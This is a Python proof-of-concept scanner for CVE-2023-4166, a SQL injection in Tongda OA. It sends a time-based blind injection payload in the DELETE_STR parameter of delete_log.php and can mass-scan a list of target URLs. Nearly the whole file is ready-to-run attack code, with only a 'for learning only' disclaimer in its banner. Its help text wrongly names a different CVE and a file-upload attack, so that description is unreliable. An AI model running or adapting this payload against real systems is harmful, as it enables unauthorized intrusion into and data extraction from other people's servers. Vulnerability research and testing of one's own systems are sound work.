import requests
import argparse
requests.packages.urllib3.disable_warnings()

# 通达 OA_CVE-2023-4166sql 注入漏
def Banner():
    banner = """                                           
   _____  __      __  ______            ___     ___    ___    ____             _  _     __     __      __  
  / ____| \ \    / / |  ____|          |__ \   / _ \  |__ \  |___ \           | || |   /_ |   / /     / /  
 | |       \ \  / /  | |__     ______     ) | | | | |    ) |   __) |  ______  | || |_   | |  / /_    / /_  
 | |        \ \/ /   |  __|   |______|   / /  | | | |   / /   |__ <  |______| |__   _|  | | | '_ \  | '_ \ 
 | |____     \  /    | |____            / /_  | |_| |  / /_   ___) |             | |    | | | (_) | | (_) |
  \_____|     \/     |______|          |____|  \___/  |____| |____/              |_|    |_|  \___/   \___/ 
                                                                                                           
                                                                          tag:  通达 OA_CVE-2023-4166sql 注入漏洞 POC                                       
                                                                    @version: 1.0.0   @author by ghhycsec                                           
                                 
              仅限学习使用，请勿用于非法测试！                                                                                               
        """
    print(banner)


def poc(url):
    payload = "/general/system/seal_manage/dianju/delete_log.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 "
    if "http" not in url:
        url = "http://" + url
    fullpath = url + payload
    header = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101Firefox/116.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zhHK;q=0.5,en-US;q=0.3,en;q=0.2",
        "Accept-Encoding": "gzip, deflate",
        "Connection": "close",
        "Upgrade-Insecure-Requests": "1"
    }
    try:
        response = requests.get(fullpath, headers=header,verify=False,timeout=15)
        if response.elapsed.seconds > 13:
            print("[+]%s 存在 CVE-2023-4166 sql 注入" % (url))
        else:
            print("[-]%s 不存在 CVE-2023-4166 sql 注入" % (url))
    except Exception as e:
        print("[-]%s 不存在 CVE-2023-4166 sql 注入" % (url))


def main():
    Banner()
    parser = argparse.ArgumentParser(description="CVE-2023-2648 检测工具 脚本使用phpinfo文件上传")
    parser.add_argument("-u", "--target", help="单个目标URL")
    parser.add_argument("-f", "--file", help="包含多个目标URL的文件")
    args = parser.parse_args()

    if args.target:
        target_urls = [args.target]
    elif args.file:
        with open(args.file, "r") as f:
            target_urls = f.read().splitlines()
    else:
        print("请使用 -u 或 -f 指定目标")
        return

    for url in target_urls:
        poc(url)


if __name__ == "__main__":
    main()